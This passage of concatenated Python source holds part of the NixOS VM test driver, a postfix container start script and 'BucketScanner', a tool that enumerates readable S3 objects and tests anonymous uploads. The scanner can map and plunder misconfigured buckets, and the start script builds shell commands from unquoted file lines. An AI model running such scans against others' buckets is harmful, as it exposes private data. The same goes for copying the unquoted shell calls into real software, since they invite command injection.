            text = self.get_tty_text(tty)
            if last:
                # final attempt: log what the TTY actually contained
                self.log(
                    f"Last chance to match /{regexp}/ on TTY{tty}, "
                    f"which currently contains: {text}"
                )
            return len(matcher.findall(text)) > 0

        with self.nested("waiting for {} to appear on tty {}".format(regexp, tty)):
            retry(tty_matches)

    def send_chars(self, chars: List[str]) -> None:
        """Type the given characters into the guest via the qemu monitor."""
        with self.nested("sending keys ‘{}‘".format(chars)):
            for char in chars:
                self.send_key(char)

    def wait_for_file(self, filename: str) -> None:
        """Waits until the file exists in machine's file system."""

        def check_file(_: Any) -> bool:
            status, _ = self.execute("test -e {}".format(filename))
            return status == 0

        with self.nested("waiting for file ‘{}‘".format(filename)):
            retry(check_file)

    def wait_for_open_port(self, port: int) -> None:
        """Wait until the guest accepts TCP connections on `port`."""

        def port_is_open(_: Any) -> bool:
            status, _ = self.execute("nc -z localhost {}".format(port))
            return status == 0

        with self.nested("waiting for TCP port {}".format(port)):
            retry(port_is_open)

    def wait_for_closed_port(self, port: int) -> None:
        """Wait until TCP `port` stops accepting connections.

        NOTE(review): unlike wait_for_open_port this has no nested() log
        scope -- inconsistent but harmless.
        """

        def port_is_closed(_: Any) -> bool:
            status, _ = self.execute("nc -z localhost {}".format(port))
            return status != 0

        retry(port_is_closed)

    def start_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
        return self.systemctl("start {}".format(jobname), user)

    def stop_job(self, jobname: str, user: Optional[str] = None) -> Tuple[int, str]:
        return self.systemctl("stop {}".format(jobname), user)

    def wait_for_job(self, jobname: str) -> None:
        # jobs are plain systemd units here
        self.wait_for_unit(jobname)
    def connect(self) -> None:
        """Boot the VM if necessary and wait until the guest root shell
        greets us over the shell socket."""
        if self.connected:
            return

        with self.nested("waiting for the VM to finish booting"):
            self.start()

            assert self.shell

            tic = time.time()
            # first recv blocks until the guest shell announces itself
            self.shell.recv(1024)
            # TODO: Timeout
            toc = time.time()

            self.log("connected to guest root shell")
            self.log("(connecting took {:.2f} seconds)".format(toc - tic))
            self.connected = True

    def screenshot(self, filename: str) -> None:
        """Take a qemu screendump and convert it to PNG.

        A bare word filename is placed as <name>.png under $out.
        """
        out_dir = os.environ.get("out", os.getcwd())
        word_pattern = re.compile(r"^\w+$")
        if word_pattern.match(filename):
            filename = os.path.join(out_dir, "{}.png".format(filename))
        tmp = "{}.ppm".format(filename)

        with self.nested(
            "making screenshot {}".format(filename),
            {"image": os.path.basename(filename)},
        ):
            self.send_monitor_command("screendump {}".format(tmp))
            ret = subprocess.run("pnmtopng {} > {}".format(tmp, filename), shell=True)
            os.unlink(tmp)
            if ret.returncode != 0:
                raise Exception("Cannot convert screenshot")
    def copy_from_host_via_shell(self, source: str, target: str) -> None:
        """Copy a file from the host into the guest by piping it over the
        shell into the destination file. Works without host-guest shared folder.
        Prefer copy_from_host for whenever possible.
        """
        with open(source, "rb") as fh:
            content_b64 = base64.b64encode(fh.read()).decode()
            self.succeed(
                f"mkdir -p $(dirname {target})",
                f"echo -n {content_b64} | base64 -d > {target}",
            )

    def copy_from_host(self, source: str, target: str) -> None:
        """Copy a file from the host into the guest via the `shared_dir` shared
        among all the VMs (using a temporary directory).
        """
        host_src = Path(source)
        vm_target = Path(target)
        with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
            shared_temp = Path(shared_td)
            host_intermediate = shared_temp / host_src.name
            # the guest sees shared_dir mounted at /tmp/shared
            vm_shared_temp = Path("/tmp/shared") / shared_temp.name
            vm_intermediate = vm_shared_temp / host_src.name

            self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
            if host_src.is_dir():
                shutil.copytree(host_src, host_intermediate)
            else:
                shutil.copy(host_src, host_intermediate)
            self.succeed(make_command(["mkdir", "-p", vm_target.parent]))
            self.succeed(make_command(["cp", "-r", vm_intermediate, vm_target]))

    def copy_from_vm(self, source: str, target_dir: str = "") -> None:
        """Copy a file from the VM (specified by an in-VM source path) to a path
        relative to `$out`. The file is copied via the `shared_dir` shared among
        all the VMs (using a temporary directory).
        """
        # Compute the source, target, and intermediate shared file names
        out_dir = Path(os.environ.get("out", os.getcwd()))
        vm_src = Path(source)
        with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
            shared_temp = Path(shared_td)
            vm_shared_temp = Path("/tmp/shared") / shared_temp.name
            vm_intermediate = vm_shared_temp / vm_src.name
            intermediate = shared_temp / vm_src.name
            # Copy the file to the shared directory inside VM
            self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
            self.succeed(make_command(["cp", "-r", vm_src, vm_intermediate]))
            abs_target = out_dir / target_dir / vm_src.name
            abs_target.parent.mkdir(exist_ok=True, parents=True)
            # Copy the file from the shared directory outside VM
            if intermediate.is_dir():
                shutil.copytree(intermediate, abs_target)
            else:
                shutil.copy(intermediate, abs_target)
    def dump_tty_contents(self, tty: str) -> None:
        """Debugging: Dump the contents of the TTY<n>"""
        self.execute("fold -w 80 /dev/vcs{} | systemd-cat".format(tty))

    def _get_screen_text_variants(self, model_ids: Iterable[int]) -> List[str]:
        """Screendump once and OCR it with each requested tesseract
        engine mode (--oem id), returning one text per mode."""
        with tempfile.TemporaryDirectory() as tmpdir:
            screenshot_path = os.path.join(tmpdir, "ppm")
            self.send_monitor_command(f"screendump {screenshot_path}")
            return _perform_ocr_on_screenshot(screenshot_path, model_ids)

    def get_screen_text_variants(self) -> List[str]:
        """OCR the screen with tesseract engine modes 0, 1 and 2."""
        return self._get_screen_text_variants([0, 1, 2])

    def get_screen_text(self) -> str:
        """OCR the screen with tesseract engine mode 2 only."""
        return self._get_screen_text_variants([2])[0]

    def wait_for_text(self, regex: str) -> None:
        """Wait until OCR of the screen matches regex in any variant."""

        def screen_matches(last: bool) -> bool:
            variants = self.get_screen_text_variants()
            for text in variants:
                if re.search(regex, text) is not None:
                    return True

            if last:
                self.log("Last OCR attempt failed. Text was: {}".format(variants))

            return False

        with self.nested("waiting for {} to appear on screen".format(regex)):
            retry(screen_matches)

    def wait_for_console_text(self, regex: str) -> None:
        """Block until regex matches the accumulated serial console output."""
        self.log("waiting for {} to appear on console".format(regex))
        # Buffer the console output, this is needed
        # to match multiline regexes.
        console = io.StringIO()
        while True:
            try:
                # NOTE(review): a plain get() blocks indefinitely, so the
                # Empty branch below looks unreachable -- presumably
                # get_nowait() or a timeout was intended; confirm.
                console.write(self.last_lines.get())
            except queue.Empty:
                self.sleep(1)
                continue
            console.seek(0)
            matches = re.search(regex, console.read())
            if matches is not None:
                return

    def send_key(self, key: str) -> None:
        """Send a single key (translated via CHAR_TO_KEY) via the monitor."""
        key = CHAR_TO_KEY.get(key, key)
        self.send_monitor_command("sendkey {}".format(key))
    def start(self) -> None:
        """Launch qemu, accept the monitor and shell socket connections,
        and spawn the serial-output logging thread."""
        if self.booted:
            return

        self.log("starting vm")

        def clear(path: Path) -> Path:
            # remove a stale socket file so bind() succeeds
            if path.exists():
                path.unlink()
            return path

        def create_socket(path: Path) -> socket.socket:
            s = socket.socket(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
            s.bind(str(path))
            s.listen(1)
            return s

        monitor_socket = create_socket(clear(self.monitor_path))
        shell_socket = create_socket(clear(self.shell_path))
        self.process = self.start_command.run(
            self.state_dir,
            self.shared_dir,
            self.monitor_path,
            self.shell_path,
        )
        # qemu connects back to the listening sockets we just created
        self.monitor, _ = monitor_socket.accept()
        self.shell, _ = shell_socket.accept()

        # Store last serial console lines for use
        # of wait_for_console_text
        self.last_lines: Queue = Queue()

        def process_serial_output() -> None:
            assert self.process
            assert self.process.stdout
            for _line in self.process.stdout:
                # Ignore undecodable bytes that may occur in boot menus
                line = _line.decode(errors="ignore").replace("\r", "").rstrip()
                self.last_lines.put(line)
                self.log_serial(line)

        self.serial_thread = threading.Thread(target=process_serial_output)
        self.serial_thread.start()

        self.wait_for_monitor_prompt()

        self.pid = self.process.pid
        self.booted = True

        self.log("QEMU running (pid {})".format(self.pid))

    def cleanup_statedir(self) -> None:
        """Delete this VM's state directory.

        NOTE(review): logs after deletion; the messages refer to the
        already-removed directory.
        """
        shutil.rmtree(self.state_dir)
        rootlog.log(f"deleting VM state directory {self.state_dir}")
        rootlog.log("if you want to keep the VM state, pass --keep-vm-state")
    def shutdown(self) -> None:
        """Ask the guest to power off cleanly, then wait for it."""
        if not self.booted:
            return

        assert self.shell
        self.shell.send("poweroff\n".encode())
        self.wait_for_shutdown()

    def crash(self) -> None:
        """Simulate a sudden power loss by telling qemu to quit."""
        if not self.booted:
            return

        self.log("forced crash")
        self.send_monitor_command("quit")
        self.wait_for_shutdown()

    def wait_for_x(self) -> None:
        """Wait until it is possible to connect to the X server. Note that
        testing the existence of /tmp/.X11-unix/X0 is insufficient.
        """

        def check_x(_: Any) -> bool:
            # require both the systemd graphical target and the X socket
            cmd = (
                "journalctl -b SYSLOG_IDENTIFIER=systemd | "
                + 'grep "Reached target Current graphical"'
            )
            status, _ = self.execute(cmd)
            if status != 0:
                return False
            status, _ = self.execute("[ -e /tmp/.X11-unix/X0 ]")
            return status == 0

        with self.nested("waiting for the X11 server"):
            retry(check_x)

    def get_window_names(self) -> List[str]:
        """Return the names of all windows known to the X server."""
        return self.succeed(
            r"xwininfo -root -tree | sed 's/.*0x[0-9a-f]* \"\([^\"]*\)\".*/\1/; t; d'"
        ).splitlines()

    def wait_for_window(self, regexp: str) -> None:
        """Wait until a window whose name matches regexp exists."""
        pattern = re.compile(regexp)

        def window_is_visible(last_try: bool) -> bool:
            names = self.get_window_names()
            if last_try:
                self.log(
                    "Last chance to match {} on the window list,".format(regexp)
                    + " which currently contains: "
                    + ", ".join(names)
                )
            return any(pattern.search(name) for name in names)

        with self.nested("Waiting for a window to appear"):
            retry(window_is_visible)

    def sleep(self, secs: int) -> None:
        # We want to sleep in *guest* time, not *host* time.
        self.succeed(f"sleep {secs}")

    def forward_port(self, host_port: int = 8080, guest_port: int = 80) -> None:
        """Forward a TCP port on the host to a TCP port on the guest.
        Useful during interactive testing.
        """
        self.send_monitor_command(
            "hostfwd_add tcp::{}-:{}".format(host_port, guest_port)
        )

    def block(self) -> None:
        """Make the machine unreachable by shutting down eth1 (the multicast
        interface used to talk to the other VMs). We keep eth0 up so that
        the test driver can continue to talk to the machine.
        """
        self.send_monitor_command("set_link virtio-net-pci.1 off")

    def unblock(self) -> None:
        """Make the machine reachable."""
        self.send_monitor_command("set_link virtio-net-pci.1 on")

    def release(self) -> None:
        """Tear down the qemu process, its sockets and the serial thread.

        NOTE(review): does not wait() on the qemu process itself; joining
        the serial thread implies its stdout reached EOF.
        """
        if self.pid is None:
            return
        rootlog.info(f"kill machine (pid {self.pid})")
        assert self.process
        assert self.shell
        assert self.monitor
        assert self.serial_thread
        self.process.terminate()
        self.shell.close()
        self.monitor.close()
        self.serial_thread.join()
class VLan:
    """This class handles a VLAN that the run-vm scripts identify via its
    number handles. The network's lifetime equals the object's lifetime.
    """

    nr: int                      # VLAN number, also embedded in the env var name
    socket_dir: Path             # vde_switch control directory
    process: subprocess.Popen    # the vde_switch process
    pid: int
    fd: io.TextIOBase            # pty master connected to vde_switch stdin

    def __repr__(self) -> str:
        return f"<Vlan Nr. {self.nr}>"

    def __init__(self, nr: int, tmp_dir: Path):
        """Start a vde_switch for this VLAN and sync with it."""
        self.nr = nr
        self.socket_dir = tmp_dir / f"vde{self.nr}.ctl"

        # TODO: don't side-effect environment here
        os.environ[f"QEMU_VDE_SOCKET_{self.nr}"] = str(self.socket_dir)
        rootlog.info("start vlan")
        pty_master, pty_slave = pty.openpty()

        self.process = subprocess.Popen(
            ["vde_switch", "-s", self.socket_dir, "--dirmode", "0700"],
            stdin=pty_slave,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            shell=False,
        )
        self.pid = self.process.pid
        self.fd = os.fdopen(pty_master, "w")
        # poke the switch so it produces output we can sync on
        self.fd.write("version\n")

        # TODO: perl version checks if this can be read from
        # an if not, dies. we could hang here forever. Fix it.
        assert self.process.stdout is not None
        self.process.stdout.readline()
        if not (self.socket_dir / "ctl").exists():
            rootlog.error("cannot start vde_switch")

        rootlog.info(f"running vlan (pid {self.pid})")

    def __del__(self) -> None:
        # NOTE(review): cleanup via __del__ is best-effort -- it only runs
        # when the object happens to be garbage-collected.
        rootlog.info(f"kill vlan (pid {self.pid})")
        self.fd.close()
        self.process.terminate()
class Driver:
    """A handle to the driver that sets up the environment
    and runs the tests"""

    tests: str                 # python source of the test script, exec'd later
    vlans: List[VLan]
    machines: List[Machine]

    def __init__(
        self,
        start_scripts: List[str],
        vlans: List[int],
        tests: str,
        keep_vm_state: bool = False,
    ):
        """Create the VLANs and one Machine per start script."""
        self.tests = tests

        tmp_dir = Path(os.environ.get("TMPDIR", tempfile.gettempdir()))
        tmp_dir.mkdir(mode=0o700, exist_ok=True)

        with rootlog.nested("start all VLans"):
            self.vlans = [VLan(nr, tmp_dir) for nr in vlans]

        def cmd(scripts: List[str]) -> Iterator[NixStartScript]:
            for s in scripts:
                yield NixStartScript(s)

        # NOTE(review): the loop variable shadows the generator `cmd`
        # above; it works, but a rename would read better.
        self.machines = [
            Machine(
                start_command=cmd,
                keep_vm_state=keep_vm_state,
                name=cmd.machine_name,
                tmp_dir=tmp_dir,
            )
            for cmd in cmd(start_scripts)
        ]

    def __enter__(self) -> "Driver":
        return self

    def __exit__(self, *_: Any) -> None:
        # release all machines regardless of how the test run ended
        with rootlog.nested("cleanup"):
            for machine in self.machines:
                machine.release()

    def subtest(self, name: str) -> Iterator[None]:
        """Group logs under a given test name"""
        # generator: intended to be wrapped by contextlib.contextmanager
        # (see test_symbols); logs and re-raises test failures
        with rootlog.nested(name):
            try:
                yield
                return True
            except Exception as e:
                rootlog.error(f'Test "{name}" failed with error: "{e}"')
                raise e

    def test_symbols(self) -> Dict[str, Any]:
        """Build the global symbol table exposed to the test script."""

        @contextmanager
        def subtest(name: str) -> Iterator[None]:
            return self.subtest(name)

        general_symbols = dict(
            start_all=self.start_all,
            test_script=self.test_script,
            machines=self.machines,
            vlans=self.vlans,
            driver=self,
            log=rootlog,
            os=os,
            create_machine=self.create_machine,
            subtest=subtest,
            run_tests=self.run_tests,
            join_all=self.join_all,
            retry=retry,
            serial_stdout_off=self.serial_stdout_off,
            serial_stdout_on=self.serial_stdout_on,
            Machine=Machine,  # for typing
        )
        machine_symbols = {m.name: m for m in self.machines}
        # If there's exactly one machine, make it available under the name
        # "machine", even if it's not called that.
        if len(self.machines) == 1:
            (machine_symbols["machine"],) = self.machines
        vlan_symbols = {
            f"vlan{v.nr}": self.vlans[idx] for idx, v in enumerate(self.vlans)
        }
        print(
            "additionally exposed symbols:\n "
            + ", ".join(map(lambda m: m.name, self.machines))
            + ",\n "
            + ", ".join(map(lambda v: f"vlan{v.nr}", self.vlans))
            + ",\n "
            + ", ".join(list(general_symbols.keys()))
        )
        return {**general_symbols, **machine_symbols, **vlan_symbols}

    def test_script(self) -> None:
        """Run the test script"""
        # the test script is trusted input (it *is* the test)
        with rootlog.nested("run the VM test script"):
            symbols = self.test_symbols()  # call eagerly
            exec(self.tests, symbols, None)

    def run_tests(self) -> None:
        """Run the test script (for non-interactive test runs)"""
        self.test_script()
        # TODO: Collect coverage data
        for machine in self.machines:
            if machine.is_up():
                machine.execute("sync")

    def start_all(self) -> None:
        """Start all machines"""
        with rootlog.nested("start all VMs"):
            for machine in self.machines:
                machine.start()

    def join_all(self) -> None:
        """Wait for all machines to shut down"""
        with rootlog.nested("wait for all VMs to finish"):
            for machine in self.machines:
                machine.wait_for_shutdown()

    def create_machine(self, args: Dict[str, Any]) -> Machine:
        """Legacy helper: build a Machine from a loose argument dict."""
        rootlog.warning(
            "Using legacy create_machine(), please instantiate the"
            "Machine class directly, instead"
        )
        tmp_dir = Path(os.environ.get("TMPDIR", tempfile.gettempdir()))
        tmp_dir.mkdir(mode=0o700, exist_ok=True)

        if args.get("startCommand"):
            start_command: str = args.get("startCommand", "")
            cmd = NixStartScript(start_command)
            name = args.get("name", cmd.machine_name)
        else:
            cmd = Machine.create_startcommand(args)  # type: ignore
            name = args.get("name", "machine")

        return Machine(
            tmp_dir=tmp_dir,
            start_command=cmd,
            name=name,
            keep_vm_state=args.get("keep_vm_state", False),
            allow_reboot=args.get("allow_reboot", False),
        )

    def serial_stdout_on(self) -> None:
        rootlog._print_serial_logs = True

    def serial_stdout_off(self) -> None:
        rootlog._print_serial_logs = False
class EnvDefault(argparse.Action):
    """An argparse Action that takes its default value from the specified
    environment variable.

    When the variable is set, its value becomes the flag's default (split
    on whitespace for multi-valued nargs) and the flag stops being required.
    """

    def __init__(self, envvar, required=False, default=None, nargs=None, **kwargs):  # type: ignore
        if not default and envvar and envvar in os.environ:
            multi_valued = nargs is not None and (
                nargs.isdigit() or nargs in ["*", "+"]
            )
            raw = os.environ[envvar]
            default = raw.split() if multi_valued else raw
            kwargs["help"] = (
                kwargs["help"] + f" (default from environment: {default})"
            )
        if required and default:
            required = False
        super().__init__(default=default, required=required, nargs=nargs, **kwargs)

    def __call__(self, parser, namespace, values, option_string=None):  # type: ignore
        setattr(namespace, self.dest, values)
if __name__ == "__main__":
    # CLI mirrors the legacy perl driver: flags may be defaulted from the
    # environment via EnvDefault (startScripts / vlans / testScript).
    arg_parser = argparse.ArgumentParser(prog="nixos-test-driver")
    arg_parser.add_argument(
        "-K",
        "--keep-vm-state",
        help="re-use a VM state coming from a previous run",
        action="store_true",
    )
    arg_parser.add_argument(
        "-I",
        "--interactive",
        help="drop into a python repl and run the tests interactively",
        action="store_true",
    )
    arg_parser.add_argument(
        "--start-scripts",
        metavar="START-SCRIPT",
        action=EnvDefault,
        envvar="startScripts",
        nargs="*",
        help="start scripts for participating virtual machines",
    )
    arg_parser.add_argument(
        "--vlans",
        metavar="VLAN",
        action=EnvDefault,
        envvar="vlans",
        nargs="*",
        help="vlans to span by the driver",
    )
    arg_parser.add_argument(
        "testscript",
        action=EnvDefault,
        envvar="testScript",
        help="the test script to run",
        type=Path,
    )

    args = arg_parser.parse_args()

    if not args.keep_vm_state:
        rootlog.info("Machine state will be reset. To keep it, pass --keep-vm-state")

    # Driver.__exit__ releases all machines even if the tests raise
    with Driver(
        args.start_scripts, args.vlans, args.testscript.read_text(), args.keep_vm_state
    ) as driver:
        if args.interactive:
            ptpython.repl.embed(driver.test_symbols(), {})
        else:
            tic = time.time()
            driver.run_tests()
            toc = time.time()
            rootlog.info(f"test script finished in {(toc-tic):.2f}s")
|
start.py | #!/usr/bin/python3
import os
import glob
import shutil
import multiprocessing
import logging as log
import sys

from podop import run_server
from socrate import system, conf

# log level is runtime-configurable through the LOG_LEVEL env var
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
    """Run the Podop table server on /tmp/podop.socket, proxying postfix
    lookup tables to the admin container's internal HTTP API."""
    os.setuid(100)  # drop root before serving
    url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/postfix/"
    # TODO: Remove verbosity setting from Podop?
    run_server(0, "postfix", "/tmp/podop.socket", [
        ("transport", "url", url + "transport/§"),
        ("alias", "url", url + "alias/§"),
        ("domain", "url", url + "domain/§"),
        ("mailbox", "url", url + "mailbox/§"),
        ("recipientmap", "url", url + "recipient/map/§"),
        ("sendermap", "url", url + "sender/map/§"),
        ("senderaccess", "url", url + "sender/access/§"),
        ("senderlogin", "url", url + "sender/login/§")
    ])
def is_valid_postconf_line(line):
    """Return True for lines worth feeding to postconf: everything except
    empty lines and comments."""
    if line == '' or line.startswith("#"):
        return False
    return True
# Actual startup script

# resolve peer container addresses once and expose them to the templates
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_MILTER_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_MILTER", "antispam:11332")
os.environ["LMTP_ADDRESS"] = system.get_host_address_from_environment("LMTP", "imap:2525")

# render the Jinja config templates into /etc/postfix
for postfix_file in glob.glob("/conf/*.cf"):
    conf.jinja(postfix_file, os.environ, os.path.join("/etc/postfix", os.path.basename(postfix_file)))

# apply operator-provided overrides via postconf
# NOTE(review): lines are interpolated into a shell command; the override
# files are operator-controlled, but quoting would still be safer.
if os.path.exists("/overrides/postfix.cf"):
    for line in open("/overrides/postfix.cf").read().strip().split("\n"):
        if is_valid_postconf_line(line):
            os.system('postconf -e "{}"'.format(line))

if os.path.exists("/overrides/postfix.master"):
    for line in open("/overrides/postfix.master").read().strip().split("\n"):
        if is_valid_postconf_line(line):
            os.system('postconf -Me "{}"'.format(line))

# compile any override lookup maps, then drop the source copies
for map_file in glob.glob("/overrides/*.map"):
    destination = os.path.join("/etc/postfix", os.path.basename(map_file))
    shutil.copyfile(map_file, destination)
    os.system("postmap {}".format(destination))
    os.remove(destination)

# relay credentials, if configured
if "RELAYUSER" in os.environ:
    path = "/etc/postfix/sasl_passwd"
    conf.jinja("/conf/sasl_passwd", os.environ, path)
    os.system("postmap {}".format(path))

# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
os.system("/usr/libexec/postfix/post-install meta_directory=/etc/postfix create-missing")
# Before starting postfix, we need to check permissions on /queue
# in the event that postfix,postdrop id have changed
os.system("postfix set-permissions")
os.execl("/usr/sbin/postfix", "postfix", "start-fg")
|
BucketScanner.py | #!/bin/env python
'''
--------------
BucketScanner
By @Rzepsky
--------------
======================= Notes =======================
This tool is made for legal purpose only!!! It allows you to:
- find collectable files for an anonymous/authenticated user in your buckets
- verify if an anonymous/authenticated user is allowed to upload arbitrary files to your buckets
====================== Options ======================
-l: specify a list with bucket names to check.
-w: specify a file to upload to a bucket.
-r: specify a regular expression to filter the output.
-s: look only for files bigger than 's' bytes
-m: look only for files smaller than 'm' bytes
-t: specify number of threads to use.
-o: specify an output file.
-h: prints a help message.
====================== Example ======================
$ python BucketScanner.py -l bucket_list.txt -w upload_file.txt -r '^.*\.(db|sql)' -t 50 -m 5242880 -o output.txt
The above command will:
- test all buckets from bucket_list.txt file
- test if you can upload upload_file.txt to any of the bucket included in bucket_list.txt
- provide URLs in output.txt only to files bigger than 5 MB and with .db or .sql extension
- work on 50 threads
'''
from argparse import ArgumentParser
from threading import Thread, Lock
import math
import boto3
import requests
import Queue  # Python 2 stdlib name (renamed `queue` in Python 3)
import re
import sys

# work queue of bucket names shared by the scanner threads
queue = Queue.Queue()

# fill these in to run authenticated; left empty, anonymous mode applies
AWS_ACCESS_KEY_ID = ''
AWS_SECRET_ACCESS_KEY = ''
class Settings(object):
    """Mutable run configuration for the scanner, populated from CLI args."""

    def __init__(self):
        # upload (write) test: disabled until a file is supplied
        self._WRITE_TEST_ENABLED = False
        self._WRITE_TEST_FILE = False
        # output and filtering defaults
        self._OUTPUT_FILE = "output.txt"
        self._MIN_SIZE = 1
        self._MAX_SIZE = 0
        self._REGEX = ".*"
        # mode flags
        self._ANONYMOUS_MODE = False
        self._DISPLAY_SIZE = True

    def set_write_test(self, write_file):
        """Enable the upload test using the given file."""
        self._WRITE_TEST_ENABLED = True
        self._WRITE_TEST_FILE = write_file

    def set_output_file(self, output_file):
        """Redirect results to the given output file."""
        self._OUTPUT_FILE = output_file

    def set_minsize(self, min_SIZE):
        """Only report objects larger than min_SIZE bytes."""
        self._MIN_SIZE = min_SIZE

    def set_maxsize(self, max_SIZE):
        """Only report objects smaller than max_SIZE bytes."""
        self._MAX_SIZE = max_SIZE

    def set_anonymous_mode(self):
        """Switch to unauthenticated requests and tell the user how to
        provide credentials instead."""
        self._ANONYMOUS_MODE = True
        print('''All tests will be executed in anonymous mode:
If you want to send all requests using your AWS account please specify
AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY variables in {0} file
'''.format(sys.argv[0]))

    def set_regex(self, regex):
        """Only report object keys matching the given regular expression."""
        self._REGEX = regex
def get_region(bucket_name):
    """Return the AWS region of *bucket_name*, or None when it cannot be read.

    Sends an unauthenticated HTTP probe; S3 reports the region in the
    'x-amz-bucket-region' response header (absent for nonexistent buckets,
    in which case headers.get() yields the None object).
    """
    try:
        response = requests.get('http://' + bucket_name + '.s3.amazonaws.com/')
        return response.headers.get('x-amz-bucket-region')
    except Exception as e:
        # Bug fix: the old message formatted 'response', which is unbound when
        # requests.get() itself raised; report the bucket name instead.
        print("Error: couldn't connect to '{0}' bucket. Details: {1}".format(
            bucket_name, e))
def get_session(bucket_name, region):
    """Return a boto3 Bucket handle for *bucket_name* in *region*.

    Uses a credential-less session when settings._ANONYMOUS_MODE is set,
    otherwise the module-level AWS key pair. Returns None (implicitly) on
    failure after printing the error.

    NOTE(review): a credential-less boto3 session still signs requests unless
    signing is disabled (botocore UNSIGNED config) -- verify that "anonymous"
    mode really is anonymous.
    """
    try:
        if settings._ANONYMOUS_MODE:
            sess = boto3.session.Session(region_name=region)
        else:
            sess = boto3.session.Session(
                region_name=region,
                aws_access_key_id=AWS_ACCESS_KEY_ID,
                aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
        conn = sess.resource('s3')
        bucket = conn.Bucket(bucket_name)
        return bucket
    except Exception as e:
        print "Error: \
couldn't create a session with '{0}' bucket. \
Details: {1}".format(bucket_name, e)
def get_bucket(bucket_name):
    """Resolve *bucket_name* to a boto3 Bucket, or "" when it does not exist.

    Bug fix: get_region() returns the None *object* (requests'
    headers.get() default) when the region header is missing, not the
    string 'None', so the nonexistent-bucket branch never fired; compare
    against both to stay safe.
    """
    region = get_region(bucket_name)
    bucket = ""
    if region is None or region == 'None':
        print("Bucket '{0}' does not exist.".format(bucket_name.encode('utf-8')))
    else:
        bucket = get_session(bucket_name, region)
    return bucket
def size(size_bytes):
    """Return *size_bytes* formatted with a binary unit suffix, e.g. "5.0MB".

    Bug fix: guard against size_bytes <= 0, where math.log() raises
    ValueError (empty S3 objects legitimately report ContentLength == 0).
    """
    if size_bytes <= 0:
        return "0B"
    size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
    # Pick the largest power of 1024 that fits, then scale down to it.
    i = int(math.floor(math.log(size_bytes, 1024)))
    p = math.pow(1024, i)
    s = round(size_bytes / p, 2)
    return "{0}{1}".format(s, size_name[i])
def is_in_limits(minsize, maxsize, content_length):
    """True when *content_length* lies strictly above *minsize* and, if an
    upper bound is configured (*maxsize* truthy), strictly below *maxsize*."""
    if not maxsize:
        return content_length > minsize
    return minsize < content_length < maxsize
def bucket_reader(bucket_name):
    """Enumerate every object in *bucket_name*, printing and recording the
    "collectable" ones.

    An object is collectable when its ContentLength is within the configured
    size limits and its key matches the configured regex. Matching URLs are
    appended to the output file in one batch per bucket.
    """
    region = get_region(bucket_name)
    if region == 'None':
        # NOTE(review): get_region() returns the None object, not the string
        # 'None', when the region header is missing -- this guard likely never
        # triggers; verify against get_region().
        pass
    else:
        print "Testing bucket {0}...".format(bucket_name)
        bucket = get_bucket(bucket_name)
        results = ""
        try:
            for s3_object in bucket.objects.all():
                try:
                    # A per-object GET is needed to learn the size.
                    content_length = s3_object.get()["ContentLength"]
                    if is_in_limits(settings._MIN_SIZE, settings._MAX_SIZE, content_length) and \
                       re.match(settings._REGEX, s3_object.key):
                        item = "http://s3.{0}.amazonaws.com/{1}/{2}".format(
                            region, bucket_name,
                            s3_object.key.encode('utf-8'))
                        results += item + '\n'
                        print "Collectable: {0} {1}".format(item, size(content_length))
                except Exception as e:
                    # One unreadable object should not abort the whole listing.
                    print "Error: couldn't get '{0}' object in '{1}' bucket. Details: {2}\n".format(
                        s3_object.key.encode('utf-8'),
                        bucket_name, e)
            append_output(results)
        except Exception as e:
            print "Error: couldn't access the '{0}' bucket. Details: {1}\n".format(bucket_name, e)
def write_test(bucket_name, filename):
    """Try to upload *filename* to the bucket to detect public write access.

    On success the uploaded object's URL is appended to the output file.

    Bug fixes: the payload file handle was never closed (now a context
    manager), and a None region (bucket unreachable) is now skipped like the
    legacy 'None' string.
    """
    region = get_region(bucket_name)
    if region is None or region == 'None':
        return
    try:
        with open(filename, 'rb') as data:
            bucket = get_bucket(bucket_name)
            bucket.put_object(Bucket=bucket_name, Key=filename, Body=data)
        print("Success: bucket '{0}' allows for uploading arbitrary files!!!".format(
            bucket_name.encode('utf-8')))
        results = "http://s3.{0}.amazonaws.com/{1}/{2}\n".format(region,
                                                                 bucket_name,
                                                                 filename)
        append_output(results)
    except Exception as e:
        print("Error: couldn't upload a {0} file to {1}. Details: {2}\n".format(
            filename, bucket_name, e))
def append_output(results):
    """Append *results* (newline-terminated URL lines) to the configured
    output file."""
    with open(settings._OUTPUT_FILE, "a") as sink:
        sink.write(results)
def bucket_worker():
    """Thread target: consume bucket names from the shared queue forever.

    Each bucket is enumerated for readable objects and, when enabled, probed
    with the arbitrary-upload write test. Errors are printed but never kill
    the worker; task_done() is always reached so queue.join() can return.
    """
    while True:
        try:
            bucket = queue.get()
            bucket_reader(bucket)
            if settings._WRITE_TEST_ENABLED:
                write_test(bucket, settings._WRITE_TEST_FILE)
        except Exception as e:
            print "Error: {0}\n".format(e)
        queue.task_done()
def print_help():
    """Print the usage banner (the same text as the module docstring)."""
    print('''
--------------
BucketScanner
By @Rzepsky
--------------
======================= Notes =======================
This tool is made for legal purpose only!!! It allows you to:
- find collectable files for an anonymous/authenticated user in your buckets
- verify if an anonymous/authenticated user is allowed to upload arbitrary files to your buckets
====================== Options ======================
-l: specify a list with bucket names to check.
-w: specify a file to upload to a bucket.
-r: specify a regular expression to filter the output.
-s: look only for files bigger than 's' bytes
-m: look only for files smaller than 'm' bytes
-t: specify number of threads to use.
-o: specify an output file.
-h: prints a help message.
====================== Example ======================
